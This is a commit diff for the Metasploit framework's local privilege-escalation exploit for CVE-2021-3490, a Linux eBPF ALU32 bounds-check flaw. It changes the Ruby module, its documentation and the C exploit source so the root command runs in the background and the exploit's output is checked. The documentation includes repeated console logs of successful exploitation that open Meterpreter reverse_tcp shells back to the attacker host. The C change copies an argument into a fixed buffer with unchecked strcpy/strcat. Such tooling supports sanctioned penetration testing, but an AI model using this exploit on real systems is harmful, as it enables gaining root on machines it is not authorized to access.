Update exploit code to use & after the command to execute as root so it executes in the background and doesn't hang Metasploit. Also update the logic of the code to check the response from executing the exploit and respond accordingly and update the documentation to match

documentation/modules/exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.md

@@ -202,9 +202,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
 
 Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SESSION                   yes       The session to run this module on.
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   CmdTimeout  120              yes       Maximum number of seconds to wait for the exploit to complete
+   SESSION                      yes       The session to run this module on.
 
 
 Payload options (linux/x64/meterpreter/reverse_tcp):
@@ -232,7 +233,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
 [*] Writing '/tmp/.802fke5' (39352 bytes) ...
 [*] Writing '/tmp/.75mogl0Vz6' (250 bytes) ...
 [*] Launching exploit ...
+[!] Note that things may appear to hang due to the exploit not exiting.
+[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
 [*] Sending stage (3012548 bytes) to 192.168.224.221
+[+] Exploit completed successfully, shell should be returning soon!
 [+] Deleted /tmp/.802fke5
 [+] Deleted /tmp/.75mogl0Vz6
 [*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.221:42170) at 2021-08-17 17:40:19 -0500
@@ -317,9 +321,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
 
 Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SESSION                   yes       The session to run this module on.
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   CmdTimeout  120              yes       Maximum number of seconds to wait for the exploit to complete
+   SESSION                      yes       The session to run this module on.
 
 
 Payload options (linux/x64/meterpreter/reverse_tcp):
@@ -346,13 +351,18 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
 [*] Started reverse TCP handler on 192.168.224.128:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable.
-[*] Writing '/tmp/.8lHII9pIja' (39352 bytes) ...
-[*] Writing '/tmp/.x3iDbm3J' (250 bytes) ...
-[*] Launching exploit ...
+[*] Writing '/tmp/.T0AUoK' (39400 bytes) ...
+[*] Writing '/tmp/.R3N8FO' (250 bytes) ...
+[*] Launching exploit...
+[!] Note that things may appear to hang due to the exploit not exiting.
+[!] Feel free to press CTRL+C if the shell is returned before 9000 seconds are up.
 [*] Sending stage (3012548 bytes) to 192.168.224.220
-[+] Deleted /tmp/.8lHII9pIja
-[+] Deleted /tmp/.x3iDbm3J
-[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.220:47878) at 2021-08-17 17:53:36 -0500
+[+] Exploit completed successfully, shell should be returning soon!
+[+] Deleted /tmp/.T0AUoK
+[+] Deleted /tmp/.R3N8FO
+[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.220:47914) at 2021-08-31 14:58:43 -0500
+
+meterpreter >
 
 meterpreter > sysinfo
 Computer     : 192.168.224.220
@@ -422,9 +432,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
 
 Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SESSION                   yes       The session to run this module on.
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   CmdTimeout  120              yes       Maximum number of seconds to wait for the exploit to complete
+   SESSION                      yes       The session to run this module on.
 
 
 Payload options (linux/x64/meterpreter/reverse_tcp):
@@ -454,7 +465,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
 [*] Writing '/tmp/.RyfMnlY' (39352 bytes) ...
 [*] Writing '/tmp/.7JmBQ1nu58' (250 bytes) ...
 [*] Launching exploit ...
+[!] Note that things may appear to hang due to the exploit not exiting.
+[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
 [*] Sending stage (3012548 bytes) to 192.168.224.222
+[+] Exploit completed successfully, shell should be returning soon!
 [+] Deleted /tmp/.RyfMnlY
 [+] Deleted /tmp/.7JmBQ1nu58
 [*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.222:48204) at 2021-08-19 14:17:12 -0500
@@ -544,9 +558,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
 
 Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SESSION                   yes       The session to run this module on.
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   CmdTimeout  120              yes       Maximum number of seconds to wait for the exploit to complete
+   SESSION                      yes       The session to run this module on.
 
 
 Payload options (linux/x64/meterpreter/reverse_tcp):
@@ -576,7 +591,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
 [*] Writing '/tmp/.VBiCx' (39352 bytes) ...
 [*] Writing '/tmp/.KqjrGX5' (250 bytes) ...
 [*] Launching exploit ...
+[!] Note that things may appear to hang due to the exploit not exiting.
+[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
 [*] Sending stage (3012548 bytes) to 192.168.224.223
+[+] Exploit completed successfully, shell should be returning soon!
 [+] Deleted /tmp/.VBiCx
 [+] Deleted /tmp/.KqjrGX5
 [*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.223:54884) at 2021-08-20 13:33:38 -0500
@@ -679,9 +697,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
 
 Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SESSION  1                yes       The session to run this module on.
+   Name        Current Setting   Required  Description
+   ----        ---------------   --------  -----------
+   CmdTimeout  120               yes       Maximum number of seconds to wait for the exploit to complete
+   SESSION     1                 yes       The session to run this module on.
 
 
 Payload options (linux/x64/meterpreter/reverse_tcp):
@@ -709,7 +728,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
 [*] Writing '/tmp/.6y6Ws' (39352 bytes) ...
 [*] Writing '/tmp/.SYYFfC' (250 bytes) ...
 [*] Launching exploit ...
+[!] Note that things may appear to hang due to the exploit not exiting.
+[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
 [*] Sending stage (3012548 bytes) to 192.168.224.223
+[+] Exploit completed successfully, shell should be returning soon!
 [+] Deleted /tmp/.6y6Ws
 [+] Deleted /tmp/.SYYFfC
 [*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.223:37368) at 2021-08-20 14:47:44 -0500
@@ -750,9 +772,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
 
 Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SESSION  1                yes       The session to run this module on.
+   Name        Current Setting   Required  Description
+   ----        ---------------   --------  -----------
+   CmdTimeout  120               yes       Maximum number of seconds to wait for the exploit to complete
+   SESSION     1                 yes       The session to run this module on.
 
 
 Payload options (linux/x64/meterpreter/reverse_tcp):
@@ -786,8 +809,11 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
 [*] Writing '/tmp/.RRaKt' (39352 bytes) ...
 [*] Writing '/tmp/.yYaQKj' (250 bytes) ...
 [*] Launching exploit ...
+[!] Note that things may appear to hang due to the exploit not exiting.
+[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
 [*] Transmitting intermediate stager...(126 bytes)
 [*] Sending stage (3012548 bytes) to 192.168.224.223
+[+] Exploit completed successfully, shell should be returning soon!
 [+] Deleted /tmp/.RRaKt
 [+] Deleted /tmp/.yYaQKj
 [*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.223:60752) at 2021-08-20 16:34:42 -0500
@@ -839,9 +865,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
 
 Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SESSION                   yes       The session to run this module on.
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   CmdTimeout  120              yes       Maximum number of seconds to wait for the exploit to complete
+   SESSION                      yes       The session to run this module on.
 
 
 Payload options (linux/x64/meterpreter/reverse_tcp):
@@ -893,7 +920,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
 [*] Writing '/tmp/.dFIC3w' (39352 bytes) ...
 [*] Writing '/tmp/.sYuymmhR3Y' (250 bytes) ...
 [*] Launching exploit ...
+[!] Note that things may appear to hang due to the exploit not exiting.
+[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
 [*] Sending stage (3012548 bytes) to 192.168.224.223
+[+] Exploit completed successfully, shell should be returning soon!
 [+] Deleted /tmp/.dFIC3w
 [+] Deleted /tmp/.sYuymmhR3Y
 [*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.223:53154) at 2021-08-20 18:02:58 -0500
@@ -949,9 +979,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
 
 Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SESSION  1                yes       The session to run this module on.
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   CmdTimeout  120             yes       Maximum number of seconds to wait for the exploit to complete
+   SESSION     1               yes       The session to run this module on.
 
 
 Payload options (linux/x64/meterpreter/reverse_tcp):
@@ -983,8 +1014,11 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
 [*] Writing '/tmp/.TGPokxM' (39352 bytes) ...
 [*] Writing '/tmp/.RM7G8l5CtW' (250 bytes) ...
 [*] Launching exploit ...
+[!] Note that things may appear to hang due to the exploit not exiting.
+[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
 [*] Transmitting intermediate stager...(126 bytes)
 [*] Sending stage (3012548 bytes) to 192.168.224.224
+[+] Exploit completed successfully, shell should be returning soon!
 [+] Deleted /tmp/.TGPokxM
 [+] Deleted /tmp/.RM7G8l5CtW
 [*] Meterpreter session 3 opened (192.168.224.128:6644 -> 192.168.224.224:45650) at 2021-08-23 14:50:52 -0500

external/source/exploits/CVE-2021-3490/Linux_LPE_eBPF_CVE-2021-3490/exploit.c

@@ -573,7 +573,10 @@ int main(int argc, char **argv)
     }
 
     printf("[+] success! enjoy r00t :)\n");
-    system(argv[1]);
+    char stringToExecute[9000];
+    strcpy(stringToExecute, argv[1]);
+    strcat(stringToExecute, " &");
+    system(stringToExecute);
 
 done:
     cleanup(&ctx);

modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb

@@ -71,9 +71,11 @@ class MetasploitModule < Msf::Exploit::Local
         'DefaultTarget' => 0
       )
     )
+    register_options([
+      OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 120])
+    ])
     register_advanced_options([
-      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
-      OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 200])
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
     ])
   end
 
@@ -203,7 +205,17 @@ class MetasploitModule < Msf::Exploit::Local
     register_file_for_cleanup(payload_path)
 
     # Launch exploit
-    print_status('Launching exploit ...')
-    cmd_exec(executable_path.to_s, payload_path.to_s, datastore['CmdTimeout'])
+    print_status('Launching exploit...')
+    print_warning('Note that things may appear to hang due to the exploit not exiting.')
+    print_warning("Feel free to press CTRL+C if the shell is returned before #{datastore['CmdTimeout']} seconds are up.")
+    response = cmd_exec(executable_path.to_s, payload_path.to_s, datastore['CmdTimeout'])
+    if response =~ /fail/
+      fail_with(Failure::NoTarget, 'The exploit failed! Check to see if you are running this against the right target and kernel version!')
+      vprint_error("The response was: #{response}")
+    elsif response =~ /success\!/
+      print_good('Exploit completed successfully, shell should be returning soon!')
+    else
+      print_status('No indication of exploit success or failure, try increasing CmdTimeout value!')
+    end
   end
 end